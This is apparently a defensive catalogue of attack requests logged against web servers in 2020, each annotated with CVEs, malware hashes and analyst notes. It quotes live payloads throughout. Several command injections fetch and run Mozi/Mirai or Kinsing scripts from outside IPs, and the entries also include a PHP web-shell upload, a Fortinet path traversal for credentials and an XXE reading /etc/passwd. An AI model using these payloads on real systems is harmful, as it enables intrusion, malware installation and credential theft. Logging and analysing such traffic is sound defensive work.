Web Server Logs
2020
Below are log entries from web servers found in 2020. Most entries are attack related and we add additional details with our suspicions of what is being attempted. When the client uses the IP address of the server in the Host request we just specify IP and do not include the actual IP address.
Unknown
GET /?a=fetch&content=<php>die(shell_exec("curl%2045.10.88.124/tf.sh|sh"))</php> 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Other GET Requests: GET /index.php?a=fetch&content=<php>die(@md5(0))</php> 1.1Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 1.1
GET /?a=fetch&content=<php>die(shell_exec("wget%20-q%20-O%20-%2045.10.88.124/tf.sh|sh"))</php> 1.1
SHA1: a493860bb6feb4267e7df05f7d48ff564b89e76a (kinsing)
Detection: Unix.Malware.Kinsing-7812065-1
Notes: Unsure what application is targeted, possible ThinkCMF. tf.sh is a shell script that deletes logs, disables firewall, selinux, apparmor, kills other malware among other things. It downloads kingsing which appears to be a miner.
Unknown redlion
GET /portal/redlion 1.1
Host: IP
User-Agent: Mozilla/5.0 zgrab/0.x
Notes: Unsure what application is targeted.Host: IP
User-Agent: Mozilla/5.0 zgrab/0.x
Dasan GPON Home Routers
POST /GponForm/diag_Form?images/ 1.1
Host: 127.0.0.1
User-Agent: Hello, World
Post Data: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://41.86.5.50:50348/Mozi.m+-O+->/tmp/gpon80;sh+
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21 (Mozi.m)Host: 127.0.0.1
User-Agent: Hello, World
Post Data: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://41.86.5.50:50348/Mozi.m+-O+->/tmp/gpon80;sh+
Detection: Linux/Mirai Variant
CVE: CVE-2018-10561
Notes: Payload is downloaded from attacking IP.
Fortinet Fortios
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 1.1
Host: fqdn
User-Agent: Mozilla/5.0
CVE: CVE-2018-13379Host: fqdn
User-Agent: Mozilla/5.0
Notes: If the device is vulnerable this can reveal usernames and passwords.
MVPower DVR
GET /shell?cd+/tmp;rm+-rf+*;wget+http://123.156.28.243:40034/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 1.1
Host: IP
User-Agent: Hello, world
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21 (Mozi.a)Host: IP
User-Agent: Hello, world
Detection: Linux/Mirai Variant
Notes: Payload is downloaded from attacking IP. Vulnerability may be in JAWS Webserver which could be used by other products.
Netgear Attack
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://27.203.167.160:40373/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 1.0
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21 (Mozi.m)Detection:Linux/Mirai Variant
Notes:Dates to 2013, Netgear DGN firmware 1.1.00.48 is patched. Authentication bypass, if URL contains currentsetting.htm authenticatoin checks are skipped. Payload is downloaded from attacking IP.
PHPUnit eval-stdin.php
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
CVE: CVE-2017-9841Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Notes: Code execution. PHPUnit should not be present on a web server.
Proxy Attempt
GET http://google.com 1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
RDP Connection Attempt
x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
Notes: This is an RDP connection attempt to a web server.ThinkCMF
GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Notes: Dates to 2019. RCE, can't find CVEHost: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
ThinkPHP
GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
CVE: CVE-2019-09082Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Notes: Dates to 2018. Authentication bypass issue. ThinkPHP 5.0.23 and 5.1.31 and newer are patched for this vulnerability.
Tomcat
GET /manager/text/list 1.1
Host: IP
User-Agent: Mozilla/5.0 zgrab/0.x
Notes: Looking for a Tomcat Manager interface exposed to the Internet. list shows list of applications running in TomcatHost: IP
User-Agent: Mozilla/5.0 zgrab/0.x
Wordpress Plugin File Manager
GET /wp-content/plugins/wp-file-manager/readme.txt 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Notes: Looking for wp-file-manager plugin installsHost: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Wordpress Plugin File Manager Exploit
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Post data: <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
CVE: CVE-2020-25213Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Post data: <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Notes: Post was trunated, it was a multipart form. The payload, php backdoor, was uploaded as k.php
Wifi ONU
POST /boaform/admin/formLogin 1.1
Host: IP
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Post Data: username=admin&psd=Feefifofum
Other GET Requests: GET /boaform/admin/formLogin?username=admin&psd=admin 1.0Host: IP
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Post Data: username=admin&psd=Feefifofum
Notes: Login attempts made using POST and GET. Appears this is targeting Wifi ONU devices.
Zeroshell
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22
CVE: CVE-2009-0545Notes: Looks to be targeting devices running Zeroshell which is a linux based router/firewall with a bug from 2009. The IP hosting the payload was down so it couldn't be retrieved.
Zimbra Collaboration Suite
POST /Autodiscover/Autodiscover.xml 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Post Data: <!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress<aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
CVE: CVE-2019-9670Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Post Data: <!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress<aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
Notes: Believe this is an XXE injection attack against Zimbra. They would be trying to retrieve the LDAP password from /etc/passwd. There is a metasploit exploit that chains this with CVE-2019-9621 to use a SSRF vulnerability to eventually upload a JSP webshell.